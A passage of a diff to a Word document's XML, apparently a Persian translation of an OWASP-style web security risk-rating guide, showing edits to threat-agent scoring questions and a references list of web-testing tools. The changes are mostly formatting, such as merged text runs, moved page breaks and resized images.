-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>عامل تهدید</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> درگیر، وابسته است. هدف در اینجا حدس احتمال یک حمله ی موفق توسط این گروه مهاجمین است. بدترین حالت عامل تهدید را در نظر بگیر.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1911,6 +1991,16 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>انگیزه</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1931,7 +2021,27 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>سطح مهارت</w:t>
+        <w:t xml:space="preserve">چقدر این </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>گروه مهاجم</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> انگیزه دارند که یک آسیب پذیری پیدا کنند و از آن طریق نفوذ کنند ؟ کم یا هیچ (1)، احتمال دستیافتن (4)،  دستیابی بالا (9)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1945,26 +2055,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>این مهاجمین از نظر فنی چقدر مهارت دارند ؟ هیچ مهارت فنی (1)، کمی مهارت فنی (3)، کاربر حرفه ای کامپیوتر</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>(4)، مهارت های برنامه نویسی و شبکه ای(6)، مهارت های تست نفوذ(9) .</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1977,103 +2067,14 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>انگیزه</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">چقدر این </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>گروه مهاجم</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> انگیزه دارند که یک آسیب پذیری پیدا کنند و از آن طریق نفوذ کنند ؟ کم یا هیچ (1)، احتمال دستیافتن (4)،  دستیابی بالا (9)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
         <w:t>شانس</w:t>
       </w:r>
     </w:p>
@@ -2340,6 +2341,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>سهولت در پیدا شدن</w:t>
       </w:r>
     </w:p>
@@ -2576,7 +2578,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>تشخیص نفوذ</w:t>
       </w:r>
     </w:p>
@@ -3652,6 +3653,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>تأث</w:t>
       </w:r>
       <w:r>
@@ -4558,7 +4560,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>نبود صحت</w:t>
       </w:r>
     </w:p>
@@ -5914,6 +5915,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>بس</w:t>
       </w:r>
       <w:r>
@@ -6516,7 +6518,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>فاکتورها</w:t>
       </w:r>
       <w:r>
@@ -10662,7 +10663,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:pict w14:anchorId="20491FBF">
           <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
             <v:stroke joinstyle="miter"/>
@@ -10683,7 +10683,7 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:468pt;height:119.25pt">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:468pt;height:119.3pt">
             <v:imagedata r:id="rId8" o:title="2"/>
             <v:shadow opacity=".5" offset="6pt,6pt"/>
           </v:shape>
@@ -11249,7 +11249,7 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
         <w:pict w14:anchorId="3053B4F5">
-          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:465.8pt;height:116.75pt">
+          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:465.85pt;height:116.6pt">
             <v:imagedata r:id="rId9" o:title="3"/>
           </v:shape>
         </w:pict>
@@ -12081,9 +12081,8 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:pict w14:anchorId="1651FB4A">
-          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:467.05pt;height:124.3pt">
+          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:466.95pt;height:124.1pt">
             <v:imagedata r:id="rId10" o:title="4"/>
           </v:shape>
         </w:pict>
@@ -13428,8 +13427,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13504,6 +13501,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>پس از ا</w:t>
       </w:r>
       <w:r>
@@ -14726,7 +14724,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">قدم 6 : سفارشی کردن مدل ارزیابی </w:t>
       </w:r>
       <w:r>
@@ -17673,6 +17670,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>فاکتورها</w:t>
       </w:r>
       <w:r>
@@ -18485,7 +18483,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>منابع</w:t>
       </w:r>
     </w:p>
@@ -19868,7 +19865,7 @@
       <w:pPr>
         <w:bidi/>
         <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
@@ -20855,6 +20852,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>بخش د</w:t>
       </w:r>
       <w:r>
@@ -21423,7 +21421,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>بخش بررس</w:t>
       </w:r>
       <w:r>
@@ -23945,7 +23942,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:pict w14:anchorId="62220904">
-          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:467.7pt;height:437pt">
+          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:468pt;height:436.85pt">
             <v:imagedata r:id="rId11" o:title="5_333"/>
           </v:shape>
         </w:pict>
@@ -23983,7 +23980,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:pict w14:anchorId="4EC0D510">
-          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:467.35pt;height:571.95pt">
+          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:467.45pt;height:571.7pt">
             <v:imagedata r:id="rId12" o:title="6_334"/>
           </v:shape>
         </w:pict>
@@ -24021,7 +24018,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:pict w14:anchorId="56BAB541">
-          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:467.35pt;height:564.75pt">
+          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:467.45pt;height:564.7pt">
             <v:imagedata r:id="rId13" o:title="7_335"/>
           </v:shape>
         </w:pict>
@@ -24059,7 +24056,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:pict w14:anchorId="53C874C6">
-          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:467.35pt;height:184.4pt">
+          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:467.45pt;height:184.3pt">
             <v:imagedata r:id="rId14" o:title="8_336"/>
           </v:shape>
         </w:pict>
@@ -25317,19 +25314,8 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">OWASP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>WebScarab</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>OWASP WebScarab</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -25365,7 +25351,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -25373,17 +25358,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>efforts</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>. Includes an XSS Attack Library, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing</w:t>
+        <w:t>efforts. Includes an XSS Attack Library, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25427,27 +25402,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">OWASP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Pantera</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Web Assessment Studio Project</w:t>
+        <w:t>OWASP Pantera Web Assessment Studio Project</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25471,7 +25426,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>SPIKE - http://www.immunitysec.com</w:t>
       </w:r>
     </w:p>
@@ -25585,7 +25539,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -25593,17 +25546,8 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Webstretch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Proxy - http://sourceforge.net/projects/webstretch</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Webstretch Proxy - http://sourceforge.net/projects/webstretch</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25627,27 +25571,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Firefox </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>LiveHTTPHeaders</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, Tamper Data and Developer Tools - http://www.mozdev.org</w:t>
+        <w:t>Firefox LiveHTTPHeaders, Tamper Data and Developer Tools - http://www.mozdev.org</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25664,7 +25588,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -25672,37 +25595,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Sensepost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Wikto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Google cached fault-finding) - http://www.sensepost.com/research/wikto/index2.html</w:t>
+        <w:t>Sensepost Wikto (Google cached fault-finding) - http://www.sensepost.com/research/wikto/index2.html</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25825,27 +25718,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">OWASP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>SWFIntruder</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.owasp.org/index.php/Category:SWFIntruder,</w:t>
+        <w:t>OWASP SWFIntruder - http://www.owasp.org/index.php/Category:SWFIntruder,</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25913,27 +25786,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">OWASP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Sprajax</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Project</w:t>
+        <w:t>OWASP Sprajax Project</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25982,19 +25835,8 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">OWASP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>SQLiX</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>OWASP SQLiX</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26041,47 +25883,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">MySQL Blind Injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Bruteforcing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, Reversing.org - [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>sqlbftools</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>]</w:t>
+        <w:t>MySQL Blind Injection Bruteforcing, Reversing.org - [sqlbftools]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26105,67 +25907,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Antonio </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Parata</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: Dump Files by SQL inference on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Mysql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>SqlDumper</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>]</w:t>
+        <w:t>Antonio Parata: Dump Files by SQL inference on Mysql - [SqlDumper]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26182,7 +25924,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -26190,17 +25931,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Sqlninja</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>: a SQL Server Injection &amp; Takeover Tool - http://sqlninja.sourceforge.net</w:t>
+        <w:t>Sqlninja: a SQL Server Injection &amp; Takeover Tool - http://sqlninja.sourceforge.net</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26224,67 +25955,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Bernardo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
